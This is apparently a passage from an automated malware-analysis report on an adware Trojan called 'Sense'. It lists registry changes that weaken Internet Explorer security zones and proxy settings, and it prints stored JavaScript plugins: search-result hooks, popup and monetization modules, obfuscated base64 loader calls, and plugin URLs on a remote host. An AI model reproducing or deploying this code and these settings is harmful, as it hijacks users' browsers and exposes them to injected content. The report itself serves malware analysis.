"Seed" = "9E 90 BC B8 1C 57 97 FD 1D 26 C9 AA FB 64 6B DA"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process Sense-codedownloader.exe:3032 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Sense\Plugins\7]
"JavaScript" = "appAPI.hooks={$:$jquery_171,hooks:{},addHook:function(a,b){this.hooks[a]=b;},removeHook:function(a){delete this.hooks[a];},register:function(b,a){return this.hooks[b]?new (this.$.Class.extend(this.$.extend(this.getClass(),this.$.isFunction(this.hooks[b])?this.hooks[b]():this.hooks[b])))(a):null;},getClass:(function(a){return function(){return{listeners:[],addListener:function(b,c){this.listeners.push({name:b,fn:c});},removeListener:function(c,d){var b=[];a.each(this.listeners,function(e,f){if(c!=f.name&&d!=f.fn){b.push(f);}});this.listeners=b;},fireEvent:function(b,c){a.each(this.listeners,a.proxy(function(d,e){if(b==e.name){e.fn.call(this,c);}},this));}};};}($jquery_171))};"

[HKCU\Software\Sense\Code]
"AppJavaScript" = " /************************************************************************************ This is your Page Code. The appAPI.ready() code block will be executed on every page load. For more information please visit our docs site: http://docs.crossrider.com*************************************************************************************/appAPI.ready(function($) { // Place your code here (you can also define new functions above this scope) // The $ object is the extension's jQuery object // alert(My new Crossrider extension works! The current page is: document.location.href);});"

[HKCU\Software\Sense\Installer]
"FullVersionForUrl" = "1_34_08_12"

[HKCU\Software\Sense\Plugins\3]
"JavaScript" = "(function(){var b=dummy so this plugin won't be empty;})();"

[HKCU\Software\Sense\Plugins\207]
"JavaScript" = "(function(){if(typeof $jquery_171===undefined){return;}var d=$jquery_171;function c(f){return true;}function b(g,f){f=appAPI.utils.isFunction(f)?f:c;return d.map(g,function(h){return f(h)?h:null;});}function a(f){f.getList=(function(){var g=f.getList;return function(h){h=h||{};return b(g.call(f),h.predicate);};}());f.getKeys=(function(){var g=f.getKeys;return function(h){h=h||{};return b(g.call(f),h.predicate);};}());f.removeAll=(function(){var g=f.removeAll;return function(h){if(!appAPI.utils.isObject(h)){return g.call(f);}d.each(f.getList(h),function(j,k){f.remove(k.key);});};}());}function e(g){g.getList=(function(){var h=g.getList;return function(i){if(appAPI.utils.isFunction(i)){return h.call(g,i);}if(!appAPI.utils.isObject(i)||!appAPI.utils.isFunction(i.callback)){return;}h.call(g,function(j){i.callback(b(j,i.predicate));});};}());g.getKeys=(function(){var h=g.getKeys;return function(i){if(appAPI.utils.isFunction(i)){return h.call(g,i);}if(!appAPI.utils.isObject(i)||!appAPI.utils.isFunction(i.callbac"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Sense\Plugins\123]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/123.js"

[HKCU\Software\Sense\Plugins\42]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/42.js"

[HKCU\Software\Sense\Plugins\91]
"Version" = "75"

[HKCU\Software\Sense\Plugins\45]
"Name" = "IEOnRequest"

[HKLM\SOFTWARE\Sense\IE]
"TotalProfiles" = "1"

[HKCU\Software\Sense\Plugins\78]
"Name" = "CrossriderInfo"

[HKCU\Software\Sense\Plugins\94]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/94.js"

[HKCU\Software\Sense\Plugins\223]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/223.js"

[HKCU\Software\Sense\Plugins\263]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/263.js"

[HKCU\Software\Sense\Plugins\242]
"Version" = "4"

[HKCU\Software\Sense\Plugins\220]
"Name" = "icm_base_m"

[HKCU\Software\Sense\Plugins\14]
"JavaScript" = "if(typeof(appAPI)===undefined){appAPI={};}var CR__bIsIEWindow=false;if(typeof window!==undefined&&typeof window.navigator!==undefined&&typeof window.navigator.userAgent!==undefined){CR__bIsIEWindow=/MSIE (\d \.\d );/.test(window.navigator.userAgent);}CR__bIsIEWindow=(CR__bIsIEWindow||(typeof appAPIinternal!==undefined));appAPI.JSON={};if(typeof JSON!==undefined&&!CR__bIsIEWindow){appAPI.JSON=JSON;}else{(function(){function f(n){return n
[HKCU\Software\Sense\Plugins\13]
"Name" = "CrossriderAppUtils"

[HKCU\Software\Sense\Plugins\36]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.isBackground=true;appAPI.tabId=BG;appAPI.internal.scope=Consts.SCOPE.BACKGROUND;appAPI.openURL=function(c,b){if(typeof c===undefined){return;}var a;if(typeof c===object){a=c;}else{a={url:c,where:b};}appAPI.internal.message.send({eventName:openURL,eventContent:a});};appAPI.internal.runHelper=function(a){if(typeof a!==string){console.error(appAPI.runHelper - Invalid parameter. Expected string (1st param) but got: (typeof a));return;}appAPI.internal.message.send({eventName:runHelper,eventContent:a});};window.alert=function(a){a=(a===null?null:a);a=(typeof a===undefined?undefined:a);appAPIinternal.alert(a);};appAPI.internal._isMonitorAPISupported_=function(){return(typeof appAPIinternal.supportMonitor!==undefined);};window.open=function(b,a,d,c){appAPI.internal.message.send({eventName:windowOpen,eve-"

[HKCU\Software\Crossrider]
"Verifier" = "39aa73fdbfd54b44fad467ed5553801b"

[HKCU\Software\Sense\Manifest]
"Version" = "21"

[HKCU\Software\Sense\Plugins\28]
"Name" = "initializer"

[HKCU\Software\Sense\Plugins\7]
"Name" = "hooks"

[HKCU\Software\Sense\Plugins\38]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.internal.callbacks.genericEvent=function(e){var d=e.eventContent;if(typeof d===undefined){return;}var a=e.eventName;if(typeof a===undefined){return;}if(typeof appAPI.internal.callbacks[a]===undefined){return;}if(typeof appAPI.internal.callbacks[a].handler!==undefined){var b=appAPI.internal.callbacks[a].handler(d);if(b){return;}}if(typeof appAPI.internal.callbacks[a].listeners===undefined){return;}for(var c in appAPI.internal.callbacks[a].listeners){appAPI.internal.callbacks[a].listeners[c](d,c);}};appAPI.internal.callbacks.addListener=function(b,a,c){if(typeof appAPI.internal.callbacks[b]===undefined){appAPI.internal.callbacks[b]={};appAPI.internal.callbacks[b].listeners={};appAPI.internal.callbacks[b].listenersAdditionalData={};appAPI.internal.callbacks[b].listenersIds=0;appAPI.internal.callbacks[b].numberO-"

[HKCU\Software\Sense\Plugins\177]
"Name" = "crossriderDashboard"

[HKCU\Software\Sense\Plugins\221]
"Name" = "icm_downloads_m"

[HKCU\Software\Sense\Plugins\223]
"Name" = "imonomy_m"

[HKCU\Software\Sense\Manifest]
"UninstallerOfferUrl" = "NA"

[HKLM\SOFTWARE\Sense\IE\Profiles]
"S-1-5-21-1844237615-1960408961-1801674531-1003" = "1"

[HKCU\Software\Sense\Installer]
"srcid" = "000803"

[HKCU\Software\Sense\Plugins\94]
"Name" = "IEPopup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1C 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Sense\Plugins\17]
"JavaScript" = "if(typeof window!==undefined){/*! * jQuery JavaScript Library v1.4.2 * http://jquery.com/ * * Copyright 2010, John Resig * Dual licensed under the MIT or GPL Version 2 licenses. * http://jquery.org/license * * Includes Sizzle.js * http://sizzlejs.com/ * Copyright 2010, The Dojo Foundation * Released under the MIT, BSD, and GPL Licenses. * * Date: Sat Feb 13 22:33:48 2010 -0500 */var $$jquery;(function(aO,D){var a=function(e,a0){return new a.fn.init(e,a0);},o=aO.jQuery,S=aO.$,ac=aO.document,Y,Q=/^[^)[^>]*$|^#([\w-] )$/,aY=/^.[^:#\[\.,]*$/,az=/\S/,N=/^(\s|\u00A0) |(\s|\u00A0) $/g,f=/^(?:)?$/,b=navigator.userAgent,v,L=false,af=[],aI,av=Object.prototype.toString,ar=Object.prototype.hasOwnProperty,h=Array.prototype.push,G=Array.prototype.slice,t=Array.prototype.indexOf;a.fn=a.prototype={init:function(e,a2){var a1,a3,a0,a4;if(!e){return this;}if(e.nodeType){this.context=this[0]=e;this.length=1;return this;}if(e===body&&!a2){this.context=ac;this[0]=ac.body;this.se."

[HKCU\Software\Sense\Installer]
"subid" = "0"

[HKCU\Software\Sense\Plugins\21]
"Version" = "5"

[HKCU\Software\Sense\Plugins\263]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MGI2ZjRkNDU0OTUxNGYxMDAzMTUwMDMwMWYwOTRiNGI0ZDVhMWYxNTA0MTU1NzRhNDYxMjA5MTYxNDAwMTMwZDA4NTQ0NDEwNDMxOTFjMDAxZDA0MDQwZDBkNWYwMzFkMDM0ZTAzMTAwZjRhMWY0MjVmNDk0ZTAzMTQ0YTMyM2EyYTIzMjIyYjI0MzMzOTIxMjgzNzM2MjIzODNhMjgyODM0M2EzMjRhMDU1ZjA3MGI0ODExMTkwMTUwNTQ1OTQ4NTk1ZTEyMTkwNDU4MzIzYTJhMjMyMjJiMjQzMzM5MjEyODM3MzYzMDNkMjgyODJmMzEyODI4M2EzNjU3MWUwMTA0MTUxNTA4MDQwMTU0MmUzMjNiMjUyZTIzMzYzZjJjMmQzNDNmMjczZTJmMjMzMTJjMjkyNTM0M2YyNzIyMzIzNTM3MzIyYzJkMmUzMjVhNWI2YjUwNDU0ZDQ1NGIxOTE5MGMwNzEyMjUxNzAxNDc1MzUxNGYxMDAzMTUwMDE2NTc0YTQ2MTIwOTE2MTQwMDEzMGQwODU0NDQxMDQzMTkxYzAwMWQwNDA0MGQwZDVmMDMxZDAzNGUwMzEwMGY0YTFmNDI1ZjQ5NGUwMzE0NGEzMjNhMmEyMzIyMmIyNDMzMzkyMTI4MzczNjIyMzgzYTI4MjgzNDNhMzI0YTA1NWYwNzBiNDgxMTE5MDE1MDU0NTk0ODU5NWUxMjE5MDQ1ODMyM2EyYTIzMjIyYjI0MzMzOTIxMjgzNzM2MzAzZDI4MjgyZjMxMjgyODNhMzY1NzFlMDEwNDE1MTUwODA0MDE1NDJlMzIzYjI1MmUyMzM2M2YyYzJkMzQzZjI3M2UyZjIzMzEyYzI5MjUzNDNmMjcyMjMyMzUzNzMyMmMyZDJlMzI1YTViNmI1MDQ1NGQ0NTRiMDEwMTBkMTAwODFlMmMwOTQ3NTM1MTVmNGU0NDZiMGQ=', 'pemeiqmxwa'"

[HKCU\Software\Sense\Installer]
"AdditionalInfo" = "{asw:[0, 1073750528, 0],browser_name:ie}"

[HKCU\Software\Sense\Plugins\226]
"URL" = "http://js.loadgenclientservice.com/plugins/javascripts/monetization/geo/set_campaign_id_m.js"

[HKCU\Software\Sense\Plugins\78]
"Version" = "5"

[HKCU\Software\Sense\Plugins\183]
"Version" = "4"

[HKCU\Software\Sense\Plugins\47]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/47.js"

[HKCU\Software\Sense\Plugins\45]
"Version" = "4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Sense\Plugins\9]
"JavaScript" = "appAPI.hooks.addHook(searchEngine,(function(a){return function(){var f={keyDelay:1000},e,h;return{init:function(i){e=this;this.addEngine({name:google,url:google,input:input[name=q],results:#rso,result:'

'});this.addEngine({name:bing,url:bing.com,input:input[name=q],results:#results > ul,result:'

'});this.addEngine({name:yandex,url:yandex.ru,input:form.b-head-search input.b-form-input__input,form.b-search input.b-form-input__input,results:.b-body-items > ol,result:'

'});this.addEngine({name:yandex,url:yandex.com,input:form.b-search input.b-form-input__input,#searchInput,results:.b-serp2-list__portion,result:'

'});this.addEngine({name:yahoo,url:yahoo.com,input:input[name=p],results:#web ol:eq(0),result:

});this.addEngine({name:yahoo,url:search.yahoo.com,input:input[name=p],results:#web ol:eq(0),result:

});this.addEngine({name:ask,urlD."

[HKCU\Software\Sense\Plugins\262]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/262.js"

[HKCU\Software\Sense\Plugins\281]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MGY3ZjYyNWEwNDEyMDYwYTI3MGIxODU3NTE1ODRlMGUwNjBlMDI0MzViNWEwODE0MDcwYjFkMTQ1YzFhMWIxODQ0MTkwODM1MTcwODA0MWM1YjEyMGUwYzM4MDcxNTQ1MTExMDEwNDgzNDI3MmYzNDNkMjkyMTJiM2QzMTJlMmEzMzIzMmEyZTM3MzczMDMwMmYyNzNmMzMzMDI1M2IzZDJiMmE0ZDA4MDUwMjRmNGI0MzQ5NDY0NDRkMGMxNTE2MTc0NzFiMTcxZTEwMDgwYzRhMDcwMjBhM2MxODE5MTA1NjI3MzMyNTIwMzUyMTJhMjYzYzJmM2QzZTM5MzMyYTIyMjYzYTM0MjYzZDMzMzk1MDU2Nzg3MDU2MDUwNzBkMGIwZjFjMzMxNjViNGU1NTU5NDA1ZDZjMGY=', 'tukxlfrzry'); }"

[HKCU\Software\Sense\Manifest]
"RunInFrame" = "false"
"PublisherName" = "Object Browser"

[HKCU\Software\Sense\Plugins\1]
"Name" = "base"

[HKCU\Software\Sense\Plugins\28]
"JavaScript" = "var CrossriderInitializerPlugin=(function(e){var c={appId:appAPI._cr_config.appID()},b,g=new e.Deferred(),f;return e.Class.extend({init:function(){b=this;e(document).ready(function(){if(!f){d();}e(body).bindExtensionEvent(__CR_REQUEST_READY,a);});},isReady:function(h){if(h===false){d();}return g.promise();}});function d(){g.resolve();f=true;}function a(){e(body).fireExtensionEvent(__CR_RESPONSE_READY,{appId:c.appId});}}($jquery_171));(function(a){appAPI.initializerPlugin=new CrossriderInitializerPlugin();}($jquery_171));"

[HKCU\Software\Sense\Plugins\17]
"Version" = "4"

[HKCU\Software\Sense\Update]
"LastCheck" = "1411237392"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Sense\Plugins\44]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/44.js"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Sense\Plugins\9]
"Name" = "search_engine_hook"

[HKCU\Software\Sense\Plugins\93]
"Version" = "13"

[HKCU\Software\Sense\Plugins\41]
"JavaScript" = "if(typeof appAPI===""undefined""){appAPI={};}(function(a){appAPI.isBackground=false;appAPI.tabId=a.getBhoInstanceId();appAPI.getTabId=function(){return appAPI.tabId;};appAPI.isActiveTab=function(){return appAPIinternal.isActiveTab();};appAPI.platform=""IE"";if(typeof appAPI.appInfo===""undefined""){appAPI.appInfo={};}var c=appAPI.internal.prefs.getChar(""fullVersionForUrl""

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Sense\Plugins\207]
"Version" = "2"

[HKCU\Software\Sense\Plugins\192]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/192.js"

[HKCU\Software\Sense\Plugins\40]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.internal.scope=Consts.SCOPE.PAGE;appAPI.internal.callbacks.setEventHandler(externalConsole,function(a){if(appAPI.dom.isIframe()){return;}var c=a.level;var b=a.text;if(typeof c===undefined){console.error(Received undefined Background console level);return;}if(typeof console[c]===undefined){console.error(Received undefined Background console level);return;}if(typeof b===undefined){console.error(Received undefined Background console text);return;}console[c](b);});appAPI.internal.callbacks.setEventHandler(onBeforeNavigate,function(a){});appAPI.internal.callbacks.setEventHandler(windowOpen,function(a){if(appAPI.dom.isIframe()||!appAPI.isActiveTab()){return;}window.open(a.url,a.name,a.specs,a.replace);});try{if(!appAPI.dom.isIframe()){appAPI.internal.activeTabCounter=0;setInterval(function(){if(appAPI.isActi-"
"Version" = "4"

[HKCU\Software\Sense\Manifest]
"AddressbarURL" = "NA"

[HKCU\Software\Sense\Plugins\223]
"Version" = "8"

[HKCU\Software\Sense\Plugins\94]
"Version" = "2"

[HKCU\Software\Sense\Plugins\184]
"Name" = "noproblemppc_m"

[HKCU\Software\Sense\Plugins\226]
"Version" = "5"

[HKCU\Software\Sense\Plugins\41]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/41.js"

[HKCU\Software\Sense\Plugins\72]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/72.js"

[HKCU\Software\Sense\Plugins\43]
"Name" = "IEMessaging"

[HKCU\Software\Sense\Plugins\180]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MTU2MDY1NDUxYTE5MWIxZTMyMTAwMjQ4NTY0NzUwMDUxYjFhMTc1ODQxNDUwZDQ5MDYwYjE3MDcxNjRjMGQwNTAxNDgxMzQzMWYwNjE3NWQ1ODU4NWExNTE3MGI1ZDUzMzgzZDJkMzgyMzM0MjEzZjI2MmEyMjMwMzEyZjM0MzMzNzIzMmIyYjIzM2QzZDNmMmUzODNiMjkzMDMxNDE1NDVjNWMyMjA2MWYwODUyMzEzODIxM2MyNTNmMzQyMDI0MmIyYjM1M2QyZjNhM2MzODNjMmMyMjJiMzgzZDQ4NWM1ZTUxMDAwODA5NWQ1YTNkMzEyOTNlMjgyMTNlM2QyNzIzMjczYzM1MzkzNDM3M2YzMDI3MjMzZDMxNGM1YTU1NDQxZjBhMDg1NjVmNTg1OTViNTU0NDBiNTg1ZDUwNTE1OTU4NWE1ZTQ0NTk1OTViNTA1MDQ4MWUwOTBlMTY1MDMwMzEyNDMwMjEzOTNmMzUzYjI5MmEzYzM4MjMzZTNhMzMyZTM2MzIzMDQ4MTMxNzA3MGU1MTM4MmQyZTNkMjEzNDMxM2MyMzI4MjIyMDMyMjYyMDM0MzYyZjI2MjAyMjIwMzIzYTNkMjIzMDMxMjMyODM4MmQ0ZjQzNjQ2ZTQwMDYxZTE4MTcwMTM4MWQwMjQ1NTg0ZTQ4MDQxMzA2MWQxYzU0NDg0ZDBmNDQxODAxMGEwNDFlNDAwNDBkMDM0NTBkNDkwMjA1MWY1MTUxNTA1ODE4MDkwMTQwNTAzMDMxMjQzMDIxMzkzZjM1M2IyOTJhM2MzODI3MzYzZTI5MjkzNjI4MmIzMTM0MzcyYzM1MjUyMzJkMzI0OTU4NTU1NDIwMGIwMTAyNGYzMjMwMmQzNTJkM2QzOTNlMmUzNjI4M2QzMTI2MzIzZTM1MjIyNjNmMjgzMDMxNDE1NDVjNWMxZTAyMTQ1ZTUyMzEzODIxM2MyNTNmMzQyMDI0MmIe-"

[HKCU\Software\Sense\Plugins\22]
"Name" = "resources"

[HKCU\Software\Sense\Plugins\2]
"Version" = "2"

[HKCU\Software\Sense\Plugins\102]
"Version" = "10"

[HKCU\Software\Sense\Plugins]
"PopupPluginList" = "42,38,46,41,44,39,35,43,36,4,14,78,13,64,207,47,182,72,94"

[HKCU\Software\Sense\Plugins\192]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MTE3YTYzNGMxYzA2MTkwNTNlMTQwNjUyNTA0ZTU2MWExOTAxMWI1YzQ1NWYwYjFkMDYwNDQwMTQ0NTA3MDExMTA3MGYxZDFhMDk1YjA1MDMxZTVmMTkwYTViNDM1YTQ1NWI0OTViNDA1YTU2NWExODFlNTc0NzZjNjM1MjAyMWEwMDAyMWUyMDE5MGE0ODRhNGE0YzFjMDYxOTA1MTg1YzQ1NWYwYjFkMDYwNDQwMTQ0NTA3MDExMTA3MGYxZDFhMDk1YjA1MDMxZTVmMTkwYTViNDM1YTQ1NWI0OTViNDA1YTU2NWExODFlNTc0NzZjNjM1MjFhMDIwMTE1MDQxYjIyMDI0ODRhNGE1ZjRkNDA0MTdmNGI0NjRhNTA0ODE4MTEwMDE5MWMwODA3MDY1MjUwNGUyZjUwMGMxMTE4NDQzNzVjNjA0ZTU0NTI0ZDU3MDIwODA2MTkwNDBiM2UyMTRmNGY0YjQ0MWQxOTA0MGExYjA1NDMyYTE5MTAxMDQxNWQ1ZTQ0MGE1YzQ1NWI1ZTRhNGQ0YTE1NTQ1NTFkMDAwOTBhMDMwMzAyMGIwNjJkMWUwMDA5MGYwZTU3NTA0ZTUzMmQzMjM2MzkyOTM5MjMzODI3MzAzNzNmMmEyZTNlM2UzNTI0MmEzMTM2MzIyNjNlMjQzNTM5MmUzMTJiNTU0MTU1NGMwNzBlMTQwNTAwMWExMzAwMTA0YzVjNGE1NzM1MzEzNzIwMjIyNjM4MzQyMzM0MmYzYzJiMzMzZDI1MzQyODJiM2QyZjMxMmI1NTEwNGU0OTZjMTc=', 'jpjntrmukf'); }"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKCU\Software\Sense\Plugins\38]
"Name" = "IECallbacks"

[HKCU\Software\Sense\Manifest]
"BgVersion" = "1"

[HKCU\Software\Sense\Plugins\38]
"Version" = "4"

[HKCU\Software\Sense\Plugins\246]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/246.js"

[HKCU\Software\Sense\Plugins\183]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/183.js"

[HKCU\Software\Sense\Installer]
"osName" = "XP32"

[HKCU\Software\Sense\Plugins\262]
"Name" = "pops_5_j_m"

[HKCU\Software\Sense\Plugins\263]
"Version" = "1"

[HKCU\Software\Sense\Plugins\2]
"Name" = "ie8_fix_1"

[HKCU\Software\Sense\Plugins\1]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/1.js"

[HKCU\Software\Sense\Plugins\64]
"Name" = "appApiMessage"

[HKCU\Software\Sense\Manifest]
"ChangePrevious" = "false"

[HKCU\Software\Sense\Plugins\177]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/177.js"

[HKCU\Software\Sense\Plugins\13]
"JavaScript" = "(function(a){a.selectedText=function(e,c){function d(){if(window.getSelection){return window.getSelection();}else{if(document.getSelection){return document.getSelection();}else{var f=document.selection&&document.selection.createRange();if(f.text){return f.text;}return false;}}return false;}if(e==null){a.debug(selectedText: no callback function provided.);return;}if(c==null){c={};}c.lastSelection=;c.minlength=c.minlength||1;c.maxlength=c.maxlength||99999999;var b;switch(typeof(c.element)){caseundefined:b=$jquery(body);break;caseobject:if(c.element instanceof jQuery){b=c.element;}else{a.debug(selectedText: element provided as an unrecorgnize object.);return;}break;casestring:b=$jquery(c.element);break;default:a.debug(selectedText: unknown element.);return;}b.mouseup(function(g){var f=d();if(f&&String(f)==c.lastSelection){c.lastSelection=;return;}else{c.lastSelection=String(f);}if(f&&String(f).length>=c.minlength&&String(f).length"

[HKCU\Software\Sense\Plugins\226]
"JavaScript" = "appAPI.internal.monetization = appAPI.internal.monetization || {};if (typeof appAPI.internal.monetization.plugins === undefined) { appAPI.internal.monetization.plugins = {}; }appAPI.internal.monetization.plugins[226] = function() { if (appAPI.internal.monetization.loader && appAPI.internal.monetization.loader.setCampaignId && appAPI.internal.monetization.getCampaignId) { if (appAPI.internal.monetization.getCampaignId() == 0) { appAPI.internal.monetization.loader.setCampaignId(1026); } }};"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKCU\Software\Sense\Plugins\123]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MGQ3ZDZmNDAwNDBjMTkxNDMxMGExYTU1NWM0MjRlMTAxOTEwMTQ0MjU5NTgwZjBjMTgxZDE1MTA0YTE2MTcwMTRiMGUwNTE2MDYxNzRhMWIxOTFhNDkwODFmNTcwNDBhMTAxZDBlMDM0ODA4MWY0NzBjMDIwZDFjNGIxNDE0MGQxZjBiMWYwZDAwMWQwNDUxMTUxNzBlMTEwOTU5M2IyNzM1MjUyOTMxM2YyYTI0MjAyMTJhMjkzMjNlMzYyOTM2MjkyMTIwMjcyNTIyMjQzZDI1M2MzMjNiNDIxNTE3MGYwYTBiMDIxMzFlNTk1YzVlMWExZTA4MDkwZjE3MDEwYjE2NDU0NjQ3NTY1MjJhM2U0YjA2MTYxOTE4MTM1YjNkMzMzYjNmMmIzNzJiMjQzZTIyMjczZTI3MmMzNDM0MjczODM2MmIyNzMzMjc0ZjQ4NmU3MTU0MWYxMjE2MWMwYjM4MTYwODVhNGM1NzQ0MGExODBjMWQxNzVlNTc1OTFlMDgxNjA5MDAxOTRhMGExOTAwNWEwYTBiMDIxMzFlNGEwNzE3MWI1ODBjMTE0MzExMDMxMDAxMDAwMjU5MGMxMTUzMTkwYjBkMDA0NTE1MDUwOTExMWYwYTA0MDAwMTBhNTAwNDEzMDAwNTFjNTAzYjNiM2IyNDM4MzUzMTNlMzEyOTIxMzYyNzMzMmYzMjI3MjIzYzI4MjAzYjJiMjMzNTM5MmIyODI3MzI0MjA5MTkwZTFiMGYwYzA3MGI1MDVjNDIxNDFmMTkwZDAxMDMxNDAyMTY1OTQ4NDY0NzU2MjQyYTVlMGYxNjA1MTYxMjRhMzkzZDJmMmEyMjM3MzcyYTNmMzMyMzMwMzMzOTNkMzQzYjM2MzczYTIzM2QzMzVhNDE2ZTZkNWEwNjFiMTMwNTA1MTYyNDAwNDY0MjU2NDY1NDUxNjYwNQ==', 'vwfblxmddx'); }"

[HKCU\Software\Sense\Plugins\1]
"Version" = "11"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKCU\Software\Sense\Plugins\242]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MWQ3ZjZjNTYwYzFlMWExZDMzMTEwYTU3NWY1NDQ2MDIxYTE5MTY1OTQ5NWEwYzFhMTcxZTQwMWUwZTBjMTYwNTBjMWEwMzBiMWEwODQ4MGEwODEzMGE1YjBlMTk0MTFlMDEzYzA0MTI0YjFlMTc1NTJmMmIyMDJhMmEzYzI0MjAyMTM1MjcyOTViMDAxNDA2MTcxMDE2NGMzZDM4MjQzYzIyM2MzNjIwMzYyMzJjMzgzMjI2MzQyYTJjMzA1OTM1MzEyZTM0MmMzNTI2MzczZDIwMmYzYzMyMjMzYjMyMzAyYjMwMjEyZTMxM2UzMzIxMzkzYzIxMmIzYjRjMmMzZjI3MmQyMjJhMjEzZDM3M2EyMjJjM2YzYzI4MzQyODMxNTkzNTMxMmUzNDJjMzUyNjM3M2QyMDJmM2MzMjI3MzMzNjJhMmIzNTI5MmYzMTMyNDQ0ZjZjN2M0NzFjMTAxZTFlMWUzMzExMGE1NzVmNTQ0NjAyMWExOTE2MTA1YzVhNGExZDBhMTkxYTQzMTUwYjA5MDUxNTFkMGEwZDBmMTkwMzRkMGYxYjAzMWI0YjAwMWQ0MjE1MDQzOTE3MDI1YTBlMTk1MTJjMjAyNTJmMzkyYzM1MzAyZjMxMjQyMjVlMDUwNzE2MDYwMDE4NDgzZTMzMjEzOTMxMmMyNzMwMzgyNzJmMzMzNzIzMjczYTNkMjA1NzMxMzIyNTMxMjkyNjM2MjYyZDJlMmIzZjM5MjYzZTIxMjAzYTIwMmYyYTMyMzUzNjI0MmEyYzMwM2IzNTQ4MmYzNDIyMjgzMTNhMzAyZDM5M2UyMTI3M2EzOTNiMjQzOTIxNTczMTMyMjUzMTI5MjYzNjI2MmQyZTJiM2YzOTIyMzYyNTNhM2EyNTI3MmIzMjM5NDE0YTdmNmM1NjE0MDYxYjBhMGYwZDJmMTE0NzRlNDQ1ODVhNWY2YzFl', 'fuetdjnmfc'); }"

[HKCU\Software\Sense\Plugins\44]
